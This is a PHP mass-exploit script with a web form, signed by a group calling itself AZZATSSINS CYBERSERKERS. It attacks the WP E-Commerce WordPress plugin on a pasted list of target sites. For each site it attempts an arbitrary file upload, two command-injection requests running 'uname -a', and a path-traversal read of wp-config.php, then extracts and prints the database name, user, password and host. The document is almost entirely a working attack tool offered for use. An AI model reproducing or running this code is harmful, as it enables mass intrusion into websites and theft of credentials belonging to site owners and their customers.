WP E-Commerce

<html>
<title>WP E-COMMERCE</title>
<body bgcolor=silver><center><div style=background:black;margin:0px;padding:4px;text-align:center;color:silver;><i><b><font color=lime>&copy; </font><a href=mailto:cyberserkers@gmail.com>AZZATSSINS CYBERSERKERS</a></b></i></div><br><br>
    <form method='POST'>
    <textarea name='sites' cols='45' rows='15'></textarea>
<br>
    _______________________________________________________________
<br><input style="background:dodgerblue;margin:0px;width:15%;padding:0px;color:#fff;border:0;font-weight:bold;" value="EXECUTE" type="submit"><br><br><br>
    </form>
<?php
@set_time_limit(0);
$sites = explode("\r\n", $_POST['sites']);
foreach($sites as $target) {
$target = trim($target);
/*AFU*/
 /*
  - file : save-data.functions.php
  - lines : 486.. 504

  line : 500

  move_uploaded_file( $_FILES['image']['tmp_name'], $new_image_path );

 */

 $headers = array("Content-Type: application/octet-stream",
 "Content-Disposition: form-data; name=\"image\"; file=\"lol.gif\"");

 $uploadfile="AZZATSSINS WAS HERE";

 $ch = curl_init($target."/wp-e-commerce/wpsc-admin/includes/save-
data.functions.php");
 curl_setopt($ch, CURLOPT_POST, true);
 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
NT 5.0)");
 curl_setopt($ch, CURLOPT_POSTFIELDS, array('image'=>"@$uploadfile"));
 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
 curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
 $postResult = curl_exec($ch);
 curl_close($ch);
 print "$postResult";
/*RCE 1*/
 /*
  - file : ajax.php
  - lines : 38 , 41 , 57

  $callback = "_wpsc_ajax_{$ajax_action}";
  call_user_func $result = call_user_func($callback);
  $ajax_action = str_replace('-', '_', $_REQUEST['wpsc_action']);

 */

 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-admin/
ajax.php?wpsc_action=uname+-a");
 curl_setopt($ch, CURLOPT_HTTPGET, 1);
 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
NT 5.0)");
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 $buf = curl_exec ($ch);
 curl_close($ch);
 unset($ch);
 echo $buf;
/*RCE 2*/
 /*
  - file : display-sales-logs.php
  - line : 23

  $controller = $_REQUEST['c'];

 */
 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-admin/
display-sales-logs.php?c=uname+-a");
 curl_setopt($ch, CURLOPT_HTTPGET, 1);
 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
NT 5.0)");
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 $buf = curl_exec ($ch);
 curl_close($ch);
 unset($ch);
 echo $buf;
/*LFI/LFD*/
 /*
  - file: misc.functions.php
  - lines : 280 .. 355

 * multiple bug in function imagecreatefromgif() , you can use any param's to
exploit it.

 * param's : [ image_name , category_id , wpsc_request_image , productid ,
image_id ]

 */

 $ch = curl_init();
 curl_setopt($ch, CURLOPT_URL, $target."/wp-e-commerce/wpsc-includes/
misc.functions.php?image_name=../../../wp-config.php");
 curl_setopt($ch, CURLOPT_HTTPGET, 1);
 curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows
NT 5.0)");
 curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
 $xp = curl_exec ($ch);
 curl_close($ch);
 unset($ch);
 if(preg_match("#DB_USER#i",$xp)){
preg_match("#'DB_NAME', '(.*?)'#i",$xp,$DB_NAME);
echo "DB_NAME:{$DB_NAME[1]}<br>";
preg_match("#'DB_USER', '(.*?)'#i",$xp,$DB_USER);
echo "DB_USER:{$DB_USER[1]}<br>";
preg_match("#'DB_PASSWORD', '(.*?)'#i",$xp,$DB_PASSWORD);
echo "DB_PASSWORD:{$DB_PASSWORD[1]}<br>";
preg_match("#'DB_HOST', '(.*?)'#i",$xp,$DB_HOST);
echo "DB_HOST:{$DB_HOST[1]}<br>";
}
 }
 ?>